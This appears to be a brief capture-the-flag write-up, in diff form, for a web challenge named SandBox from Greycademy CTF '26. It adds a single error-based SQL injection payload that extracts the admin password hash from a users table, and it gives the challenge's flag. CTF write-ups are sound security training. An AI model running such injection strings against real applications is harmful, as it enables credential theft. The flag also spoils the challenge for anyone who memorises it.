ghx312/Write_Ups/2026/Greycademy CTF '26/WEB/SandBox/Writeup.md

 http://challs.nusgreyhats.org:30080

 # Solve
+This payload allows us to exploit the vulnerable structure of the form input.
+`' AND 1=CAST((SELECT password_hash FROM users WHERE username='admin') AS INTEGER)--`
 The flag is also in the DB provided when downloading the challenge WebApp

 # Flag
 grey{this_is_a_database_secret}